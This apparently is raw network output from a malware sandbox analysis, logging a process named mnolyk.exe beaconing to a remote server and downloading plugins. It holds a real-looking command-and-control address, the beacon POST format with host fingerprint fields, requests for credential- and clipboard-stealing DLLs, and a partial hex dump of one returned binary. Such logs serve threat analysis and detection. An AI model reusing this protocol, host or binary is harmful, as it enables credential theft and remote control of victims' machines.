Feb 7, 2023 20:04:16.192492008 CET	50469	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.193370104 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.254825115 CET	80	50470	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.255059958 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.255316973 CET	80	50469	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.255398035 CET	50469	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.255517960 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.318300962 CET	80	50470	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.320497990 CET	80	50470	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.320997000 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.425079107 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.425877094 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.486816883 CET	80	50471	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.486850977 CET	80	50470	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.487005949 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.487063885 CET	50470	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.488079071 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.549525023 CET	80	50471	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.553069115 CET	80	50471	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.553158045 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.658919096 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.659679890 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.719996929 CET	80	50471	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.720040083 CET	80	50472	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.720266104 CET	50471	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.720329046 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.721903086 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.782346010 CET	80	50472	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.785454988 CET	80	50472	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.785629034 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.894371033 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.895267963 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.954879999 CET	80	50472	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.954979897 CET	50472	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.957114935 CET	80	50473	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.957233906 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.958101034 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.019891024 CET	80	50473	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.023379087 CET	80	50473	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.023528099 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.146166086 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.146877050 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.207315922 CET	80	50474	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.207453966 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.208177090 CET	80	50473	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.208272934 CET	50473	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.216226101 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.278192043 CET	80	50474	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.282707930 CET	80	50474	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.282841921 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.399935961 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.400614023 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.461833000 CET	80	50474	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.462872028 CET	80	50475	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.462960958 CET	50474	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.463453054 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.464492083 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.526176929 CET	80	50475	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.529103041 CET	80	50475	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.530755997 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.646625996 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.646634102 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.708195925 CET	80	50476	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.708472013 CET	80	50475	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.708655119 CET	50475	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.708966017 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.709098101 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.770932913 CET	80	50476	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.773282051 CET	80	50476	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.773384094 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.880425930 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.881256104 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.940711021 CET	80	50477	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.940859079 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.941982985 CET	80	50476	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:17.942254066 CET	50476	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:17.942955971 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.002701044 CET	80	50477	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.007100105 CET	80	50477	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.007909060 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.112782955 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.120085955 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.172341108 CET	80	50477	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.173553944 CET	50477	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.181550980 CET	80	50478	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.186763048 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.186763048 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.248322964 CET	80	50478	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.252865076 CET	80	50478	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.256989002 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.362730980 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.362921000 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.422303915 CET	80	50479	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.422533035 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.422959089 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.424482107 CET	80	50478	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.424609900 CET	50478	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.482635975 CET	80	50479	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.484904051 CET	80	50479	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.485033035 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.596962929 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.597832918 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.656768084 CET	80	50479	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.657004118 CET	50479	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.658252001 CET	80	50480	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.658396959 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.662379026 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.722606897 CET	80	50480	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.724710941 CET	80	50480	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.724860907 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.831243038 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.832638979 CET	50481	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.891714096 CET	80	50480	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.891803026 CET	80	50481	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.891829967 CET	50480	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.891963959 CET	50481	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.893120050 CET	50481	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:18.952367067 CET	80	50481	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.956362963 CET	80	50481	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:18.956444025 CET	50481	80	192.168.2.6	62.204.41.4

HTTP Request Dependency Graph

62.204.41.4

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49718	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:50.878460884 CET	8	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:50.942157030 CET	9	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49719	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:50.895771027 CET	9	OUT	GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
Feb 7, 2023 20:00:50.958431959 CET	9	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:50 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 7, 2023 20:00:51.114259005 CET	10	OUT	GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
Feb 7, 2023 20:00:51.177059889 CET	11	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:51 GMT Content-Type: application/octet-stream Content-Length: 91136 Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT Connection: keep-alive ETag: "63dd4219-16400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
Feb 7, 2023 20:00:51.177088976 CET	12	IN	Data Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff Data Ascii: j h<ph?#hYj8h<h#h`lYj8h<h"hLYj8h<h"h ,Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
Feb 7, 2023 20:00:51.177117109 CET	14	IN	Data Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08 Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
Feb 7, 2023 20:00:51.177145004 CET	15	IN	Data Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50 Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
Feb 7, 2023 20:00:51.177177906 CET	16	IN	Data Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
Feb 7, 2023 20:00:51.177210093 CET	18	IN	Data Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24 Data Ascii: A:Bu\|$t{A:Bts%snD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu81u\|$0D$\|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
Feb 7, 2023 20:00:51.177238941 CET	19	IN	Data Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00 Data Ascii: lD$r;uD$D$s:u9\|$A:Bu&\|$A:Bu\|$A:Bt~GwvD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu0xf90u\|$0D$\|$0L$@T$T
Feb 7, 2023 20:00:51.177269936 CET	20	IN	Data Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00 Data Ascii: rI#+RQ\|$thi5t$t$0hiL$xWxr\|$4L$ CL$ ;xudD$r;uD$D$s:u1\|$A:Bu\|$tzA:Bu\|$tkA:Btc_u^
Feb 7, 2023 20:00:51.177303076 CET	22	IN	Data Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8 Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
Feb 7, 2023 20:00:51.177334070 CET	23	IN	Data Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55 Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
Feb 7, 2023 20:00:51.239826918 CET	25	IN	Data Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85 Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49728	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:53.301054955 CET	115	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:53.365572929 CET	115	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.6	49821	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:17.548024893 CET	227	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:17.612590075 CET	227	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.6	49822	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:17.781117916 CET	228	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:17.844888926 CET	228	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.6	49823	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
